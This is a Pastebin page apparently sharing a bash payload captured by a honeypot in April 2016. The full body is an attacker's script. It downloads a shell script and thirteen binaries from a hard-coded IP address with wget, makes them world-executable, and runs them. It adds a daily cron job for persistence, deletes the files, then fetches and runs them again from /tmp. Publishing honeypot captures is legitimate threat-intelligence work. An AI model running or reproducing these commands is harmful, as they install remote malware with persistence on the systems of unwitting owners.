Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-04-28 23:56

Apr 28th, 2016
158
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.35 KB | None | 0 0
  1. wget http://80.82.70.231/sh.sh
  2. wget http://80.82.70.231/B1
  3. wget http://80.82.70.231/B2
  4. wget http://80.82.70.231/B3
  5. wget http://80.82.70.231/B4
  6. wget http://80.82.70.231/B5
  7. wget http://80.82.70.231/B6
  8. wget http://80.82.70.231/B7
  9. wget http://80.82.70.231/B8
  10. wget http://80.82.70.231/B9
  11. wget http://80.82.70.231/B10
  12. wget http://80.82.70.231/B11
  13. wget http://80.82.70.231/B12
  14. wget http://80.82.70.231/B13
  15.  
  16. chmod 777 *
  17.  
  18. ./B1
  19. ./B2
  20. ./B3
  21. ./B4
  22. ./B5
  23. ./B6
  24. ./B7
  25. ./B8
  26. ./B9
  27. ./B10
  28. ./B11
  29. ./B12
  30. ./B13
  31.  
  32. mv sh.sh /var/run/sh.sh
  33. wget http://80.82.70.231/sh.sh -O /etc/cron.daily/sh.sh
  34. crontab -e
  35. 5 0 * * * /etc/cron.daily/sh.sh
  36.  
  37. rm -rf B1
  38. rm -rf B3
  39. rm -rf B4
  40. rm -rf B5
  41. rm -rf B6
  42. rm -rf B7
  43. rm -rf B8
  44. rm -rf B9
  45. rm -rf B10
  46. rm -rf B11
  47. rm -rf B12
  48. rm -rf B13
  49. rm -rf B2
  50.  
  51. wget http://80.82.70.231/B1 -O /tmp/B1
  52. wget http://80.82.70.231/B2 -O /tmp/B2
  53. wget http://80.82.70.231/B3 -O /tmp/B3
  54. wget http://80.82.70.231/B4 -O /tmp/B4
  55. wget http://80.82.70.231/B5 -O /tmp/B5
  56. wget http://80.82.70.231/B6 -O /tmp/B6
  57. wget http://80.82.70.231/B7 -O /tmp/B7
  58. wget http://80.82.70.231/B8 -O /tmp/B8
  59. wget http://80.82.70.231/B9 -O /tmp/B9
  60. wget http://80.82.70.231/B10 -O /tmp/B10
  61. wget http://80.82.70.231/B11 -O /tmp/B11
  62. wget http://80.82.70.231/B12 -O /tmp/B12
  63. wget http://80.82.70.231/B13 -O /tmp/B13
  64.  
  65. chmod 777 /tmp/*
  66.  
  67. /tmp/B1
  68. /tmp/B2
  69. /tmp/B3
  70. /tmp/B4
  71. /tmp/B5
  72. /tmp/B6
  73. /tmp/B7
  74. /tmp/B8
  75. /tmp/B9
  76. /tmp/B10
  77. /tmp/B11
  78. /tmp/B12
  79. /tmp/B13
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement